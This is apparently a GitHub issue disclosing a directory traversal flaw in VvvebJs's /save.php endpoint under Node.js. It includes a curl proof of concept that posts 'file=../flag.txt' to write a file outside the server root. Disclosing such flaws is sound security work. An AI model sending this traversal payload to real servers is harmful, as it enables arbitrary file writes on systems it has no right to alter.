Directory Traversal in /save.php allows arbitrary file write via file parameter

VvvebJs suffers from a directory traversal vulnerability in the /save.php endpoint. The issue allows remote attackers to write arbitrary files outside the intended directory via the file POST parameter due to insufficient sanitization of user input.

This vulnerability exists only when the application is run using Node.js, following the project documentation (node save.js).

POC:
```
# Start the application with:
node save.js

# Send the malicious request:
curl -X POST http://localhost:8080/save.php \
  -d 'file=../flag.txt&html=exploit'
```

This will create a file named flag.txt one level above the server root, demonstrating path traversal and arbitrary file write.



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Directory Traversal in /save.php allows arbitrary file write via file parameter #409

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

Directory Traversal in /save.php allows arbitrary file write via file parameter #409

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions